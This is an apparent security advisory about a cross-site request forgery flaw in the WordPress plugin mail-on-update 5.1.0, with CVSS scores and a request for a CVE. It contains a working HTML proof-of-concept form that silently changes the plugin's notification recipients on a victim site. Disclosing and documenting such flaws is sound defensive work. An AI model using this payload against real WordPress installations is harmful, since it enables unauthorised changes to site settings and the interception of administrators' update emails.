WordPress plugin mail-on-update CSRF

2013-05-16 / 2013-05-18
Credit: Henri Salo
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Can I get 2013 CVE for WordPress plugin mail-on-update CSRF vulnerability. PoC for "List of alternative recipients" below. Tested 5.1.0 version. Homepage: http://wordpress.org/extend/plugins/mail-on-update/ Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/ <html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post" class="buttom-primary"> <input name="mailonupdate_mailto" type="hidden" value="example0 () example com example1 () example com example2 () example com example3 () example com example4 () example com example5 () example com example6 () example com example7 () example com example8 () example com example9 () example com example10 () example com henri+monkey () nerv fi" /> <input name="submit" type="submit" value="Save"/></form></html> If attacker adds random email to that form default user won't get emails and attacker might be interested to receive these as the email contains information of available plugin updates.

References:

http://seclists.org/oss-sec/2013/q2/345
http://wordpress.org/extend/plugins/mail-on-update/
http://plugins.svn.wordpress.org/mail-on-update/trunk/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top